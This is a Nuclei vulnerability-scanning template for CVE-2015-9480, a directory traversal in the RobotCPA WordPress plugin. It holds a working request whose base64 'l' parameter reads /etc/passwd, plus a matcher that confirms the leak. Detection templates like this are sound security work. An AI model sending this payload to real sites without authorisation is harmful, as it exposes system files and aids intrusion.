nuclei-templates/cves/2015/CVE-2015-9480.yaml

26 lines
590 B
YAML
Raw Normal View History

2021-07-14 14:13:26 +00:00
id: CVE-2015-9480
info:
name: WordPress Plugin RobotCPA 5 - Directory Traversal
author: daffainfo
severity: high
reference: |
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480
- https://www.exploit-db.com/exploits/37252
2021-07-15 08:46:52 +00:00
tags: cve,cve2015,wordpress,wp-plugin,lfi
2021-07-14 14:13:26 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk"
matchers-condition: and
matchers:
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0"
2021-07-14 14:13:26 +00:00
part: body
- type: status
status:
- 200